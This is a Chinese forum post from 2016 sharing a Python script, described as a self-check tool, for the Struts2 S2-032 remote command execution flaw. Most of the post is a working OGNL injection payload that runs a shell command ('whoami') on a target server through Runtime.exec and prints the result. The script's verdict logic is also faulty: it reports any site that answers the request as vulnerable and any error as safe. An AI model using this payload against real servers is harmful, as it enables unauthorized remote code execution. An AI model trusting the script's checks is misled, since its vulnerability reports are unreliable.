今两天各大漏洞平台都被Struts2命令执行漏洞所刷屏了,网上有各种利用代码,看到他们的都很复杂,索性就写了一个Python脚本给各位测试吧!
本脚本仅用于安全测试,不得用于非法用途,否则自负!
[Python] 纯文本查看 复制代码 #! /usr/bin/env python
# coding:utf-8
##############################################
#
# 简易版S2-032自查脚本 V1.0
#
# 20160428 V1.0
#
# By:EvillenG QQ:2264672229
#
##############################################
import urllib
import sys
print
print "简易版S2-032自查脚本 V1.0 By:EvillenG"
print
print "本脚本仅用于安全测试,不得用于非法用途,否则自负!"
print
def getHtml(url):
req = urllib.urlopen(url)
date = req.read()
print date
def main():
try:
comm = raw_input("URL:")
get_exp = comm + "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8"
targetHtml = getHtml(str(get_exp))
print targetHtml
print
print "此网站存在Struts2命令执行漏洞,请尽快打补丁,谢谢!"
print
except:
print
print "此网站不存在Struts2命令执行漏洞,请放心使用,谢谢!"
print
if __name__=='__main__':
main()
| 
发表于 2016-5-2 23:30:45
